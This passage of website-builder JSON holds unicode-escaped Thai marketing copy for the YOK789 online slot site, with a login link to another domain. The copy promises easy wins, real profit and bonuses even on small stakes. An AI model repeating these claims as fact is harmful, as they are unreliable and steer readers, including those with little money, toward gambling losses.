\\u0e43\\u0e04\\u0e23\\u0e01\\u0e33\\u0e25\\u0e31\\u0e07\\u0e21\\u0e2d\\u0e07\\u0e2b\\u0e32\\u0e1e\\u0e37\\u0e49\\u0e19\\u0e17\\u0e35\\u0e48\\u0e17\\u0e33\\u0e40\\u0e07\\u0e34\\u0e19\\u0e41\\u0e1a\\u0e1a\\u0e2a\\u0e19\\u0e38\\u0e01\\u0e41\\u0e25\\u0e30\\u0e17\\u0e49\\u0e32\\u0e17\\u0e32\\u0e22 \\u0e17\\u0e35\\u0e48\\u0e19\\u0e35\\u0e48\\u0e04\\u0e37\\u0e2d\\u0e2a\\u0e19\\u0e32\\u0e21\\u0e17\\u0e35\\u0e48\\u0e15\\u0e2d\\u0e1a\\u0e42\\u0e08\\u0e17\\u0e22\\u0e4c\\u0e17\\u0e31\\u0e49\\u0e07\\u0e04\\u0e27\\u0e32\\u0e21\\u0e21\\u0e31\\u0e19\\u0e41\\u0e25\\u0e30\\u0e42\\u0e2d\\u0e01\\u0e32\\u0e2a\\u0e23\\u0e27\\u0e22\\u0e43\\u0e19\\u0e17\\u0e35\\u0e48\\u0e40\\u0e14\\u0e35\\u0e22\\u0e27<\\/span><\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"d34d1e8\",\"elType\":\"widget\",\"settings\":{\"title\":\"\\u0e04\\u0e27\\u0e32\\u0e21\\u0e19\\u0e48\\u0e32\\u0e2a\\u0e19\\u0e43\\u0e08\\u0e02\\u0e2d\\u0e07\\u0e01\\u0e32\\u0e23\\u0e2a\\u0e21\\u0e31\\u0e04\\u0e23 YOK789 \\u0e40\\u0e27\\u0e47\\u0e1a\\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15 \\u0e40\\u0e25\\u0e48\\u0e19\\u0e41\\u0e15\\u0e01\\u0e07\\u0e48\\u0e32\\u0e22 \",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"07fc632\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><span style=\\\"font-weight: 400;\\\">\\u0e04\\u0e27\\u0e32\\u0e21\\u0e1b\\u0e31\\u0e07\\u0e02\\u0e2d\\u0e07\\u0e17\\u0e35\\u0e48\\u0e19\\u0e35\\u0e48\\u0e44\\u0e21\\u0e48\\u0e44\\u0e14\\u0e49\\u0e21\\u0e35\\u0e41\\u0e04\\u0e48\\u0e40\\u0e01\\u0e21\\u0e41\\u0e15\\u0e01\\u0e07\\u0e48\\u0e32\\u0e22\\u0e41\\u0e15\\u0e48\\u0e40\\u0e23\\u0e34\\u0e48\\u0e21\\u0e15\\u0e31\\u0e49\\u0e07\\u0e41\\u0e15\\u0e48\\u0e02\\u0e31\\u0e49\\u0e19\\u0e15\\u0e2d\\u0e19\\u0e2a\\u0e21\\u0e31\\u0e04\\u0e23\\u0e17\\u0e35\\u0e48\\u0e42\\u0e04\\u0e15\\u0e23\\u0e44\\u0e27 \\u0e01\\u0e23\\u0e2d\\u0e01\\u0e02\\u0e49\\u0e2d\\u0e21\\u0e39\\u0e25\\u0e44\\u0e21\\u0e48\\u0e01\\u0e35\\u0e48\\u0e02\\u0e31\\u0e49\\u0e19\\u0e01\\u0e47\\u0e1e\\u0e23\\u0e49\\u0e2d\\u0e21\\u0e25\\u0e38\\u0e22 \\u0e44\\u0e21\\u0e48\\u0e21\\u0e35\\u0e04\\u0e27\\u0e32\\u0e21\\u0e22\\u0e38\\u0e48\\u0e07\\u0e22\\u0e32\\u0e01\\u0e43\\u0e2b\\u0e49\\u0e40\\u0e2a\\u0e35\\u0e22\\u0e2d\\u0e32\\u0e23\\u0e21\\u0e13\\u0e4c \\u0e23\\u0e2d\\u0e07\\u0e23\\u0e31\\u0e1a\\u0e17\\u0e31\\u0e49\\u0e07\\u0e21\\u0e37\\u0e2d\\u0e16\\u0e37\\u0e2d\\u0e41\\u0e25\\u0e30\\u0e04\\u0e2d\\u0e21 \\u0e40\\u0e25\\u0e48\\u0e19\\u0e44\\u0e14\\u0e49\\u0e17\\u0e38\\u0e01\\u0e17\\u0e35\\u0e48\\u0e17\\u0e38\\u0e01\\u0e40\\u0e27\\u0e25\\u0e32 \\u0e23\\u0e30\\u0e1a\\u0e1a\\u0e04\\u0e27\\u0e32\\u0e21\\u0e1b\\u0e25\\u0e2d\\u0e14\\u0e20\\u0e31\\u0e22\\u0e41\\u0e19\\u0e48\\u0e19\\u0e2b\\u0e19\\u0e32 \\u0e17\\u0e33\\u0e43\\u0e2b\\u0e49\\u0e21\\u0e31\\u0e48\\u0e19\\u0e43\\u0e08\\u0e44\\u0e14\\u0e49\\u0e27\\u0e48\\u0e32\\u0e02\\u0e49\\u0e2d\\u0e21\\u0e39\\u0e25\\u0e41\\u0e25\\u0e30\\u0e18\\u0e38\\u0e23\\u0e01\\u0e23\\u0e23\\u0e21\\u0e16\\u0e39\\u0e01\\u0e14\\u0e39\\u0e41\\u0e25\\u0e2d\\u0e22\\u0e48\\u0e32\\u0e07\\u0e14\\u0e35 \\u0e17\\u0e35\\u0e48\\u0e2a\\u0e33\\u0e04\\u0e31\\u0e0d\\u0e04\\u0e37\\u0e2d\\u0e21\\u0e35\\u0e17\\u0e35\\u0e21\\u0e14\\u0e39\\u0e41\\u0e25\\u0e15\\u0e25\\u0e2d\\u0e14\\u0e40\\u0e27\\u0e25\\u0e32 \\u0e04\\u0e2d\\u0e22\\u0e0b\\u0e31\\u0e1e\\u0e1e\\u0e2d\\u0e23\\u0e4c\\u0e15\\u0e40\\u0e21\\u0e37\\u0e48\\u0e2d\\u0e21\\u0e35\\u0e04\\u0e33\\u0e16\\u0e32\\u0e21\\u0e2b\\u0e23\\u0e37\\u0e2d\\u0e1b\\u0e31\\u0e0d\\u0e2b\\u0e32\\u0e40\\u0e01\\u0e34\\u0e14\\u0e02\\u0e36\\u0e49\\u0e19 <\\/span><a href=\\\"https:\\/\\/luca333auto.com\\/\\\"><b>\\u0e40\\u0e02\\u0e49\\u0e32\\u0e2a\\u0e39\\u0e48\\u0e23\\u0e30\\u0e1a\\u0e1a<\\/b><\\/a><span style=\\\"font-weight: 400;\\\"> \\u0e17\\u0e35\\u0e48\\u0e19\\u0e35\\u0e48\\u0e08\\u0e38\\u0e14\\u0e41\\u0e02\\u0e47\\u0e07\\u0e2d\\u0e35\\u0e01\\u0e2d\\u0e22\\u0e48\\u0e32\\u0e07\\u0e04\\u0e37\\u0e2d\\u0e01\\u0e32\\u0e23\\u0e2d\\u0e31\\u0e1b\\u0e40\\u0e14\\u0e15\\u0e40\\u0e01\\u0e21\\u0e43\\u0e2b\\u0e21\\u0e48\\u0e2a\\u0e21\\u0e48\\u0e33\\u0e40\\u0e2a\\u0e21\\u0e2d \\u0e17\\u0e33\\u0e43\\u0e2b\\u0e49\\u0e44\\u0e21\\u0e48\\u0e23\\u0e39\\u0e49\\u0e2a\\u0e36\\u0e01\\u0e08\\u0e33\\u0e40\\u0e08 \\u0e40\\u0e25\\u0e48\\u0e19\\u0e40\\u0e21\\u0e37\\u0e48\\u0e2d\\u0e44\\u0e23\\u0e01\\u0e47\\u0e21\\u0e35\\u0e2d\\u0e30\\u0e44\\u0e23\\u0e2a\\u0e14\\u0e43\\u0e2b\\u0e21\\u0e48\\u0e43\\u0e2b\\u0e49\\u0e25\\u0e2d\\u0e07 \\u0e43\\u0e04\\u0e23\\u0e2d\\u0e22\\u0e32\\u0e01\\u0e40\\u0e1b\\u0e34\\u0e14\\u0e1b\\u0e23\\u0e30\\u0e2a\\u0e1a\\u0e01\\u0e32\\u0e23\\u0e13\\u0e4c\\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15\\u0e41\\u0e1a\\u0e1a\\u0e21\\u0e31\\u0e19\\u0e08\\u0e31\\u0e14\\u0e40\\u0e15\\u0e47\\u0e21\\u0e41\\u0e25\\u0e30\\u0e21\\u0e35\\u0e42\\u0e2d\\u0e01\\u0e32\\u0e2a\\u0e17\\u0e33\\u0e01\\u0e33\\u0e44\\u0e23\\u0e08\\u0e23\\u0e34\\u0e07 \\u0e01\\u0e32\\u0e23\\u0e2a\\u0e21\\u0e31\\u0e04\\u0e23\\u0e17\\u0e35\\u0e48\\u0e19\\u0e35\\u0e48\\u0e04\\u0e37\\u0e2d\\u0e01\\u0e49\\u0e32\\u0e27\\u0e41\\u0e23\\u0e01\\u0e2a\\u0e39\\u0e48\\u0e40\\u0e2a\\u0e49\\u0e19\\u0e17\\u0e32\\u0e07\\u0e2a\\u0e32\\u0e22\\u0e1b\\u0e31\\u0e48\\u0e19\\u0e17\\u0e35\\u0e48\\u0e44\\u0e21\\u0e48\\u0e18\\u0e23\\u0e23\\u0e21\\u0e14\\u0e32<\\/span><\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"6b44269\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<ul><li><h3><span style=\\\"color: #99cc00;\\\"><b>YOK789 <\\/b><\\/span><b><span style=\\\"color: #99cc00;\\\">\\u0e41\\u0e08\\u0e01\\u0e42\\u0e1b\\u0e23\\u0e42\\u0e21\\u0e0a\\u0e31\\u0e19\\u0e08\\u0e31\\u0e14\\u0e40\\u0e15\\u0e47\\u0e21<\\/span> <\\/b><\\/h3><\\/li><\\/ul><p><b><span style=\\\"font-weight: 400;\\\">\\u0e16\\u0e49\\u0e32\\u0e1e\\u0e39\\u0e14\\u0e16\\u0e36\\u0e07\\u0e04\\u0e27\\u0e32\\u0e21\\u0e04\\u0e38\\u0e49\\u0e21\\u0e17\\u0e35\\u0e48\\u0e08\\u0e31\\u0e1a\\u0e15\\u0e49\\u0e2d\\u0e07\\u0e44\\u0e14\\u0e49 \\u0e40\\u0e27\\u0e47\\u0e1a\\u0e40\\u0e23\\u0e32\\u0e04\\u0e37\\u0e2d\\u0e2a\\u0e32\\u0e22\\u0e40\\u0e1b\\u0e22\\u0e4c\\u0e15\\u0e31\\u0e27\\u0e08\\u0e23\\u0e34\\u0e07 \\u0e42\\u0e1b\\u0e23\\u0e42\\u0e21\\u0e0a\\u0e31\\u0e19\\u0e21\\u0e32\\u0e41\\u0e1a\\u0e1a\\u0e08\\u0e31\\u0e14\\u0e2b\\u0e19\\u0e31\\u0e01\\u0e08\\u0e31\\u0e14\\u0e40\\u0e15\\u0e47\\u0e21\\u0e44\\u0e21\\u0e48\\u0e21\\u0e35\\u0e01\\u0e31\\u0e4a\\u0e01 \\u0e17\\u0e31\\u0e49\\u0e07\\u0e42\\u0e1a\\u0e19\\u0e31\\u0e2a\\u0e2a\\u0e21\\u0e32\\u0e0a\\u0e34\\u0e01\\u0e43\\u0e2b\\u0e21\\u0e48 \\u0e42\\u0e1b\\u0e23\\u0e1d\\u0e32\\u0e01\\u0e23\\u0e32\\u0e22\\u0e27\\u0e31\\u0e19 \\u0e41\\u0e25\\u0e30\\u0e01\\u0e34\\u0e08\\u0e01\\u0e23\\u0e23\\u0e21\\u0e25\\u0e38\\u0e49\\u0e19\\u0e23\\u0e32\\u0e07\\u0e27\\u0e31\\u0e25\\u0e17\\u0e35\\u0e48\\u0e2a\\u0e25\\u0e31\\u0e1a\\u0e2b\\u0e21\\u0e38\\u0e19\\u0e40\\u0e27\\u0e35\\u0e22\\u0e19\\u0e43\\u0e2b\\u0e49\\u0e23\\u0e48\\u0e27\\u0e21\\u0e2a\\u0e19\\u0e38\\u0e01\\u0e15\\u0e25\\u0e2d\\u0e14 \\u0e17\\u0e33\\u0e43\\u0e2b\\u0e49\\u0e17\\u0e38\\u0e01\\u0e01\\u0e32\\u0e23\\u0e40\\u0e15\\u0e34\\u0e21\\u0e40\\u0e07\\u0e34\\u0e19\\u0e21\\u0e35\\u0e1e\\u0e25\\u0e31\\u0e07\\u0e21\\u0e32\\u0e01\\u0e01\\u0e27\\u0e48\\u0e32\\u0e1b\\u0e01\\u0e15\\u0e34 \\u0e04\\u0e27\\u0e32\\u0e21\\u0e1e\\u0e35\\u0e04\\u0e2d\\u0e22\\u0e39\\u0e48\\u0e17\\u0e35\\u0e48\\u0e40\\u0e07\\u0e37\\u0e48\\u0e2d\\u0e19\\u0e44\\u0e02\\u0e40\\u0e02\\u0e49\\u0e32\\u0e43\\u0e08\\u0e07\\u0e48\\u0e32\\u0e22 \\u0e44\\u0e21\\u0e48\\u0e0b\\u0e31\\u0e1a\\u0e0b\\u0e49\\u0e2d\\u0e19 \\u0e23\\u0e31\\u0e1a\\u0e2a\\u0e34\\u0e17\\u0e18\\u0e34\\u0e4c\\u0e44\\u0e27\\u0e44\\u0e21\\u0e48\\u0e15\\u0e49\\u0e2d\\u0e07\\u0e23\\u0e2d\\u0e19\\u0e32\\u0e19 \\u0e41\\u0e04\\u0e48\\u0e01\\u0e14\\u0e23\\u0e31\\u0e1a\\u0e01\\u0e47\\u0e1e\\u0e23\\u0e49\\u0e2d\\u0e21\\u0e25\\u0e38\\u0e22\\u0e15\\u0e48\\u0e2d\\u0e44\\u0e14\\u0e49\\u0e17\\u0e31\\u0e19\\u0e17\\u0e35 \\u0e1a\\u0e23\\u0e23\\u0e22\\u0e32\\u0e01\\u0e32\\u0e28\\u0e43\\u0e19\\u0e40\\u0e27\\u0e47\\u0e1a\\u0e40\\u0e25\\u0e22\\u0e40\\u0e15\\u0e47\\u0e21\\u0e44\\u0e1b\\u0e14\\u0e49\\u0e27\\u0e22\\u0e04\\u0e27\\u0e32\\u0e21\\u0e15\\u0e37\\u0e48\\u0e19\\u0e40\\u0e15\\u0e49\\u0e19\\u0e40\\u0e2b\\u0e21\\u0e37\\u0e2d\\u0e19\\u0e21\\u0e35\\u0e1a\\u0e39\\u0e2a\\u0e15\\u0e4c\\u0e40\\u0e1e\\u0e34\\u0e48\\u0e21\\u0e17\\u0e38\\u0e01\\u0e04\\u0e23\\u0e31\\u0e49\\u0e07\\u0e17\\u0e35\\u0e48\\u0e2b\\u0e21\\u0e38\\u0e19 \\u0e40\\u0e01\\u0e21\\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15\\u0e41\\u0e15\\u0e48\\u0e25\\u0e30\\u0e23\\u0e2d\\u0e1a\\u0e21\\u0e35\\u0e04\\u0e27\\u0e32\\u0e21\\u0e2b\\u0e27\\u0e31\\u0e07\\u0e21\\u0e32\\u0e01\\u0e02\\u0e36\\u0e49\\u0e19\\u0e40\\u0e1e\\u0e23\\u0e32\\u0e30\\u0e21\\u0e35\\u0e42\\u0e1b\\u0e23\\u0e0a\\u0e48\\u0e27\\u0e22\\u0e14\\u0e31\\u0e19 \\u0e43\\u0e04\\u0e23\\u0e0a\\u0e2d\\u0e1a\\u0e1f\\u0e35\\u0e25\\u0e40\\u0e25\\u0e48\\u0e19\\u0e41\\u0e25\\u0e49\\u0e27\\u0e44\\u0e14\\u0e49\\u0e01\\u0e33\\u0e44\\u0e23\\u0e40\\u0e1e\\u0e34\\u0e48\\u0e21\\u0e41\\u0e1a\\u0e1a\\u0e40\\u0e19\\u0e35\\u0e22\\u0e19 \\u0e46 \\u0e17\\u0e35\\u0e48\\u0e19\\u0e35\\u0e48\\u0e15\\u0e2d\\u0e1a\\u0e42\\u0e08\\u0e17\\u0e22\\u0e4c\\u0e41\\u0e1a\\u0e1a\\u0e2a\\u0e38\\u0e14\\u0e17\\u0e32\\u0e07 \\u0e17\\u0e33\\u0e43\\u0e2b\\u0e49\\u0e01\\u0e32\\u0e23\\u0e1b\\u0e31\\u0e48\\u0e19\\u0e17\\u0e38\\u0e01\\u0e04\\u0e23\\u0e31\\u0e49\\u0e07\\u0e44\\u0e21\\u0e48\\u0e43\\u0e0a\\u0e48\\u0e41\\u0e04\\u0e48\\u0e2a\\u0e19\\u0e38\\u0e01\\u0e41\\u0e15\\u0e48\\u0e22\\u0e31\\u0e07\\u0e23\\u0e39\\u0e49\\u0e2a\\u0e36\\u0e01\\u0e27\\u0e48\\u0e32\\u0e04\\u0e38\\u0e49\\u0e21\\u0e04\\u0e48\\u0e32\\u0e41\\u0e1a\\u0e1a\\u0e40\\u0e2b\\u0e47\\u0e19\\u0e0a\\u0e31\\u0e14\\u0e17\\u0e38\\u0e01\\u0e22\\u0e2d\\u0e14<\\/span><\\/b><\\/p><ul><li><h3><b><span style=\\\"color: #99cc00;\\\">\\u0e43\\u0e0a\\u0e49\\u0e17\\u0e38\\u0e19\\u0e19\\u0e49\\u0e2d\\u0e22\\u0e01\\u0e47\\u0e40\\u0e25\\u0e48\\u0e19\\u0e44\\u0e14\\u0e49<\\/span> <\\/b><\\/h3><\\/li><\\/ul><p><b><span style=\\\"font-weight: 400;\\\">\\u0e2a\\u0e32\\u0e22\\u0e07\\u0e1a\\u0e19\\u0e49\\u0e2d\\u0e22\\u0e44\\u0e21\\u0e48\\u0e15\\u0e49\\u0e2d\\u0e07\\u0e16\\u0e2d\\u0e22\\u0e40\\u0e1b\\u0e34\\u0e14\\u0e42\\u0e2b\\u0e21\\u0e14\\u0e43\\u0e2b\\u0e49\\u0e40\\u0e23\\u0e34\\u0e48\\u0e21\\u0e15\\u0e49\\u0e19\\u0e07\\u0e48\\u0e32\\u0e22\\u0e14\\u0e49\\u0e27\\u0e22\\u0e40\\u0e1a\\u0e17\\u0e2a\\u0e1a\\u0e32\\u0e22\\u0e01\\u0e23\\u0e30\\u0e40\\u0e1b\\u0e4b\\u0e32 \\u0e41\\u0e04\\u0e48\\u0e21\\u0e35\\u0e17\\u0e38\\u0e19\\u0e2b\\u0e25\\u0e31\\u0e01\\u0e2a\\u0e34\\u0e1a\\u0e01\\u0e47\\u0e40\\u0e02\\u0e49\\u0e32\\u0e21\\u0e32\\u0e2a\\u0e31\\u0e21\\u0e1c\\u0e31\\u0e2a\\u0e04\\u0e27\\u0e32\\u0e21\\u0e21\\u0e31\\u0e19\\u0e44\\u0e14\\u0e49\\u0e17\\u0e31\\u0e19\\u0e17\\u0e35 \\u0e44\\u0e21\\u0e48\\u0e15\\u0e49\\u0e2d\\u0e07\\u0e23\\u0e2d\\u0e40\\u0e07\\u0e34\\u0e19\\u0e01\\u0e49\\u0e2d\\u0e19\\u0e43\\u0e2b\\u0e0d\\u0e48\\u0e01\\u0e47\\u0e21\\u0e35\\u0e2a\\u0e34\\u0e17\\u0e18\\u0e34\\u0e4c\\u0e25\\u0e38\\u0e49\\u0e19\\u0e23\\u0e32\\u0e07\\u0e27\\u0e31\\u0e25 \\u0e23\\u0e30\\u0e1a\\u0e1a\\u0e40\\u0e01\\u0e21\\u0e16\\u0e39\\u0e01\\u0e2d\\u0e2d\\u0e01\\u0e41\\u0e1a\\u0e1a\\u0e43\\u0e2b\\u0e49\\u0e21\\u0e37\\u0e2d\\u0e43\\u0e2b\\u0e21\\u0e48\\u0e08\\u0e31\\u0e1a\\u0e17\\u0e32\\u0e07\\u0e44\\u0e14\\u0e49\\u0e44\\u0e27 \\u0e40\\u0e25\\u0e48\\u0e19\\u0e40\\u0e1e\\u0e25\\u0e34\\u0e19\\u0e44\\u0e21\\u0e48\\u0e01\\u0e14\\u0e14\\u0e31\\u0e19 \\u0e17\\u0e33\\u0e43\\u0e2b\\u0e49\\u0e01\\u0e32\\u0e23\\u0e1a\\u0e23\\u0e34\\u0e2b\\u0e32\\u0e23\\u0e17\\u0e38\\u0e19\\u0e40\\u0e1b\\u0e47\\u0e19\\u0e40\\u0e23\\u0e37\\u0e48\\u0e2d\\u0e07\\u0e07\\u0e48\\u0e32\\u0e22 \\u0e43\\u0e04\\u0e23\\u0e2d\\u0e22\\u0e32\\u0e01\\u0e04\\u0e48\\u0e2d\\u0e22 \\u0e46 \\u0e1b\\u0e31\\u0e49\\u0e19\\u0e01\\u0e33\\u0e44\\u0e23\\u0e41\\u0e1a\\u0e1a\\u0e44\\u0e21\\u0e48\\u0e40\\u0e2a\\u0e35\\u0e48\\u0e22\\u0e07\\u0e2b\\u0e19\\u0e31\\u0e01\\u0e01\\u0e47\\u0e27\\u0e32\\u0e07\\u0e41\\u0e1c\\u0e19\\u0e44\\u0e14\\u0e49\\u0e15\\u0e32\\u0e21\\u0e2a\\u0e44\\u0e15\\u0e25\\u0e4c \\u0e04\\u0e27\\u0e32\\u0e21\\u0e40\\u0e1f\\u0e35\\u0e49\\u0e22\\u0e27\\u0e04\\u0e37\\u0e2d\\u0e41\\u0e21\\u0e49\\u0e43\\u0e0a\\u0e49\\u0e17\\u0e38\\u0e19\\u0e44\\u0e21\\u0e48\\u0e21\\u0e32\\u0e01\\u0e01\\u0e47\\u0e22\\u0e31\\u0e07\\u0e44\\u0e14\\u0e49\\u0e1f\\u0e35\\u0e25\\u0e40\\u0e14\\u0e35\\u0e22\\u0e27\\u0e01\\u0e31\\u0e1a\\u0e2a\\u0e32\\u0e22\\u0e17\\u0e38\\u0e19\\u0e2a\\u0e39\\u0e07 \\u0e17\\u0e38\\u0e01\\u0e01\\u0e32\\u0e23\\u0e2b\\u0e21\\u0e38\\u0e19\\u0e21\\u0e35\\u0e42\\u0e2d\\u0e01\\u0e32\\u0e2a\\u0e41\\u0e15\\u0e01\\u0e08\\u0e23\\u0e34\\u0e07\\u0e41\\u0e1a\\u0e1a\\u0e44\\u0e21\\u0e48\\u0e41\\u0e1a\\u0e48\\u0e07\\u0e0a\\u0e19\\u0e0a\\u0e31\\u0e49\\u0e19 \\u0e40\\u0e1b\\u0e47\\u0e19\\u0e1e\\u0e37\\u0e49\\u0e19\\u0e17\\u0e35\\u0e48\\u0e17\\u0e35\\u0e48\\u0e43\\u0e2b\\u0e49\\u0e17\\u0e38\\u0e01\\u0e04\\u0e19\\u0e40\\u0e23\\u0e34\\u0e48\\u0e21\\u0e15\\u0e49\\u0e19\\u0e44\\u0e14\\u0e49\\u0e40\\u0e17\\u0e48\\u0e32\\u0e01\\u0e31\\u0e19 \\u0e41\\u0e25\\u0e49\\u0e27\\u0e04\\u0e48\\u0e2d\\u0e22\\u0e15\\u0e48\\u0e2d\\u0e22\\u0e2d\\u0e14\\u0e01\\u0e33\\u0e44\\u0e23\\u0e43\\u0e2b\\u0e49\\u0e42\\u0e15\\u0e02\\u0e36\\u0e49\\u0e19\\u0e15\\u0e32\\u0e21\\u0e08\\u0e31\\u0e07\\u0e2b\\u0e27\\u0e30\\u0e02\\u0e2d\\u0e07\\u0e15\\u0e31\\u0e27\\u0e40\\u0e2d\\u0e07<\\/span><\\/b><\\/p><ul><li><h3><span style=\\\"color: #99cc00;\\\"><b>\\u0e40\\u0e01\\u0e21\\u0e2b\\u0e25\\u0e32\\u0e01\\u0e2b\\u0e25\\u0e32\\u0e22 \\u0e04\\u0e48\\u0e32\\u0e22\\u0e14\\u0e31\\u0e07\\u0e04\\u0e23\\u0e1a <\\/b><\\/span><\\/h3><\\/li><\\/ul><p><span style=\\\"font-weight: 400;\\\">\\u0e04\\u0e27\\u0e32\\u0e21\\u0e2a\\u0e19\\u0e38\\u0e01\\u0e02\\u0e2d\\u0e07\\u0e40\\u0e27\\u0e47\\u0e1a\\u0e04\\u0e37\\u0e2d\\u0e01\\u0e32\\u0e23\\u0e23\\u0e27\\u0e21\\u0e40\\u0e01\\u0e21\\u0e2b\\u0e25\\u0e32\\u0e01\\u0e2b\\u0e25\\u0e32\\u0e22\\u0e41\\u0e19\\u0e27\\u0e44\\u0e27\\u0e49\\u0e43\\u0e19\\u0e17\\u0e35\\u0e48\\u0e40\\u0e14\\u0e35\\u0e22\\u0e27 \\u0e17\\u0e31\\u0e49\\u0e07\\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15\\u0e18\\u0e35\\u0e21\\u0e41\\u0e1f\\u0e19\\u0e15\\u0e32\\u0e0b\\u0e35 \\u0e1c\\u0e08\\u0e0d\\u0e20\\u0e31\\u0e22 \\u0e27\\u0e31\\u0e12\\u0e19\\u0e18\\u0e23\\u0e23\\u0e21 \\u0e41\\u0e25\\u0e30\\u0e2a\\u0e44\\u0e15\\u0e25\\u0e4c\\u0e04\\u0e25\\u0e32\\u0e2a\\u0e2a\\u0e34\\u0e01\\u0e43\\u0e2b\\u0e49\\u0e40\\u0e25\\u0e37\\u0e2d\\u0e01\\u0e1b\\u0e31\\u0e48\\u0e19\\u0e44\\u0e21\\u0e48\\u0e0b\\u0e49\\u0e33\\u0e2d\\u0e32\\u0e23\\u0e21\\u0e13\\u0e4c \\u0e04\\u0e48\\u0e32\\u0e22\\u0e40\\u0e01\\u0e21\\u0e0a\\u0e31\\u0e49\\u0e19\\u0e19\\u0e33\\u0e16\\u0e39\\u0e01\\u0e04\\u0e31\\u0e14\\u0e21\\u0e32\\u0e41\\u0e1a\\u0e1a\\u0e40\\u0e19\\u0e49\\u0e19\\u0e04\\u0e38\\u0e13\\u0e20\\u0e32\\u0e1e \\u0e20\\u0e32\\u0e1e\\u0e01\\u0e23\\u0e32\\u0e1f\\u0e34\\u0e01\\u0e04\\u0e21\\u0e0a\\u0e31\\u0e14 \\u0e40\\u0e2d\\u0e1f\\u0e40\\u0e1f\\u0e01\\u0e15\\u0e4c\\u0e08\\u0e31\\u0e14\\u0e40\\u0e15\\u0e47\\u0e21 \\u0e40\\u0e25\\u0e48\\u0e19\\u0e41\\u0e25\\u0e49\\u0e27\\u0e25\\u0e37\\u0e48\\u0e19\\u0e44\\u0e2b\\u0e25\\u0e44\\u0e21\\u0e48\\u0e21\\u0e35\\u0e2a\\u0e30\\u0e14\\u0e38\\u0e14 \\u0e17\\u0e33\\u0e43\\u0e2b\\u0e49\\u0e17\\u0e38\\u0e01\\u0e04\\u0e23\\u0e31\\u0e49\\u0e07\\u0e17\\u0e35\\u0e48\\u0e40\\u0e02\\u0e49\\u0e32\\u0e40\\u0e27\\u0e47\\u0e1a\\u0e40\\u0e2b\\u0e21\\u0e37\\u0e2d\\u0e19\\u0e44\\u0e14\\u0e49\\u0e40\\u0e1b\\u0e34\\u0e14\\u0e42\\u0e25\\u0e01\\u0e43\\u0e2b\\u0e21\\u0e48\\u0e02\\u0e2d\\u0e07\\u0e04\\u0e27\\u0e32\\u0e21\\u0e1a\\u0e31\\u0e19\\u0e40\\u0e17\\u0e34\\u0e07 \\u0e08\\u0e30\\u0e2a\\u0e32\\u0e22\\u0e0a\\u0e2d\\u0e1a\\u0e42\\u0e1a\\u0e19\\u0e31\\u0e2a\\u0e01\\u0e23\\u0e30\\u0e08\\u0e32\\u0e22\\u0e2b\\u0e23\\u0e37\\u0e2d\\u0e2a\\u0e32\\u0e22\\u0e25\\u0e38\\u0e49\\u0e19\\u0e41\\u0e08\\u0e47\\u0e01\\u0e1e\\u0e2d\\u0e15\\u0e01\\u0e47\\u0e21\\u0e35\\u0e15\\u0e31\\u0e27\\u0e40\\u0e25\\u0e37\\u0e2d\\u0e01\\u0e15\\u0e2d\\u0e1a\\u0e42\\u0e08\\u0e17\\u0e22\\u0e4c\\u0e04\\u0e23\\u0e1a \\u0e04\\u0e27\\u0e32\\u0e21\\u0e14\\u0e35\\u0e07\\u0e32\\u0e21\\u0e04\\u0e37\\u0e2d\\u0e21\\u0e35\\u0e01\\u0e32\\u0e23\\u0e2d\\u0e31\\u0e1b\\u0e40\\u0e14\\u0e15\\u0e40\\u0e01\\u0e21\\u0e43\\u0e2b\\u0e21\\u0e48\\u0e40\\u0e02\\u0e49\\u0e32\\u0e21\\u0e32\\u0e40\\u0e23\\u0e37\\u0e48\\u0e2d\\u0e22 \\u0e46 \\u0e44\\u0e21\\u0e48\\u0e1b\\u0e25\\u0e48\\u0e2d\\u0e22\\u0e43\\u0e2b\\u0e49\\u0e04\\u0e27\\u0e32\\u0e21\\u0e2a\\u0e19\\u0e38\\u0e01\\u0e14\\u0e23\\u0e2d\\u0e1b \\u0e43\\u0e04\\u0e23\\u0e40\\u0e1a\\u0e37\\u0e48\\u0e2d\\u0e2d\\u0e30\\u0e44\\u0e23\\u0e40\\u0e14\\u0e34\\u0e21 \\u0e46 \\u0e01\\u0e47\\u0e2a\\u0e25\\u0e31\\u0e1a\\u0e41\\u0e19\\u0e27\\u0e44\\u0e14\\u0e49\\u0e17\\u0e31\\u0e19\\u0e17\\u0e35 \\u0e40\\u0e1b\\u0e47\\u0e19\\u0e04\\u0e25\\u0e31\\u0e07\\u0e40\\u0e01\\u0e21\\u0e17\\u0e35\\u0e48\\u0e17\\u0e33\\u0e43\\u0e2b\\u0e49\\u0e01\\u0e32\\u0e23\\u0e1b\\u0e31\\u0e48\\u0e19\\u0e41\\u0e15\\u0e48\\u0e25\\u0e30\\u0e27\\u0e31\\u0e19\\u0e44\\u0e21\\u0e48\\u0e19\\u0e48\\u0e32\\u0e40\\u0e1a\\u0e37\\u0e48\\u0e2d\\u0e41\\u0e25\\u0e30\\u0e40\\u0e15\\u0e47\\u0e21\\u0e44\\u0e1b\\u0e14\\u0e49\\u0e27\\u0e22\\u0e2a\\u0e35\\u0e2a\\u0e31\\u0e19\\u0e15\\u0e25\\u0e2d\\u0e14\\u0e40\\u0e27\\u0e25\\u0e32<\\/span><\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"e9ff89c\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/amb18b.com\\/wp-content\\/uploads\\/2026\\/02\\/Character-1-.webp\",\"id\":294,\"size\":\"\",\"alt\":\"yok789\",\"source\":\"library\"},\"image_size\":\"full\"},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"8b749b2\",\"elType\":\"widget\",\"settings\":{\"title\":\"\\u0e1a\\u0e2d\\u0e01\\u0e15\\u0e48\\u0e2d\\u0e17\\u0e32\\u0e07\\u0e40\\u0e02\\u0e49\\u0e32\\u0e01\\u0e32\\u0e23\\u0e17\\u0e33\\u0e40\\u0e07\\u0e34\\u0e19 \\u0e17\\u0e32\\u0e07\\u0e40\\u0e02\\u0e49\\u0e32 YOK 